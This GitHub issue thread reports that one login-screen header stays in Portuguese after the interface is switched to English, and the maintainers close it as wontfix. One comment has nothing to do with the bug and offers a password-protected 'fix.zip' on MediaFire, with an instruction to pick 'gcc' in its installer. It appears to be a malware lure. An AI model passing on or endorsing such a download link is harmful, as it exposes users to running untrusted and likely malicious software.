### ISSUE TITLE
Localization Issue On Login Screen

### ISSUE THREAD

**Issue by ChrisMarshallNY** [bmlt-enabled/bmlt-root-server#1021]
This was observed on an older version of the server, so it may no longer be an issue.

Looks like one of the tokens is not being converted properly.

The server is base-localized in Portuguese, but I switched to English, then hit login (which I expected to fail, but it converts the screen to English).

One of the headers is still in Portuguese (see attached).

![ScreenGrab](https://github.com/user-attachments/assets/4cdd45ca-2bdf-4512-b1fe-4362d2bb7952)

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pjaudiomv** [comment]
This likely won't be fixed as we are working on new UI now. It won't be issue in new UI.

**Comment by ChrisMarshallNY** [comment]
Since this is basically #wontfix, I'm closing it.
